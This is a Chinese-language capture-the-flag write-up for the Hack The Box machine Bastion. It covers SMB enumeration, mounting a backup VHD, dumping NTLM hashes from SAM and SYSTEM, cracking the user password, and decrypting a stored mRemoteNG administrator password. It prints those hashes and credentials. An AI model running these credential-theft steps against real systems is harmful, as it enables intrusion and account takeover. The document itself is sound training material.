前言
這台是 Hack The Box 的 Bastion,難度是 Easy
使用到的技巧:
- Mount smb to kali
- Extract password from SAM and SYSTEM (.vhd file)
- Insecure mRemoteNG
Attacker: 10.10.16.2
Target: 10.10.10.134
Recon
- nmap
sudo nmap -sV -sC 10.10.10.134PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-05-09T07:55:56+02:00
| smb2-time:
| date: 2024-05-09T05:56:00
|_ start_date: 2024-05-09T05:48:18
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: -44m56s, deviation: 1h09m16s, median: -4m57s看起來是要玩 smb
- smbclient
先看有哪些 Share
smbclient -N -L \\\\10.10.10.134\\Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC有個 Backups
smbclient -N \\\\10.10.10.134\\Backups連上之後逛一下找到這個路徑,裡面有兩個 .vhd 檔案,用 get 載下來
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\>Exploit
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd 這個檔案很大
載很久才載完,所以先看這個
7z x 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd直接 segmentation fault
不過有些檔案已經解出來了,但 Windows\System32\config 底下沒有 SAM 跟 SYSTEM
另一個檔案就可以解出來,但沒看到什麼特別的東西
查了一下看到這篇文章
https://infinitelogins.com/2020/12/11/how-to-mount-extract-password-hashes-vhd-files/
照著做嘗試 mount vhd 到 kali 上
sudo apt install libguestfs-tools -ysudo mkdir /mnt/vhdguestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd做完之後 /mnt/vhd 還是空的,推測一開始就沒有載完整
嘗試直接從 target mount 過來
sudo mount -t cifs //10.10.10.134/backups /mnt/backups -o user=,password=成功了! 
接下來再 mount vhd
sudo guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd
複製 SAM 跟 SYSTEM 出來
sudo cp vhd/Windows/System32/config/SAM ~/HTB/machine/Bastionsudo cp vhd/Windows/System32/config/SYSTEM ~/HTB/machine/Bastiondump 出 password hash
samdump2 SYSTEM SAM*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::丟 crackstation 
拿到 L4mpje 的 password
bureaulampje拿到 user shell 
Privilege Escalation
沒有權限下 systeminfo,開的權限不知道有什麼提權的招
不過 Program Files (x86) 裡面有 mRemoteNG
在 C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml 裡面會有 admin 的 password
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="50
0e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNF
V5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" H
ostname="127.0.0.1" ......看起來像 base64 但解出來是亂碼,再查一下找到這個
https://github.com/haseebT/mRemoteNG-Decrypt
用這個腳本解出密碼 
連上後取得 admin shell 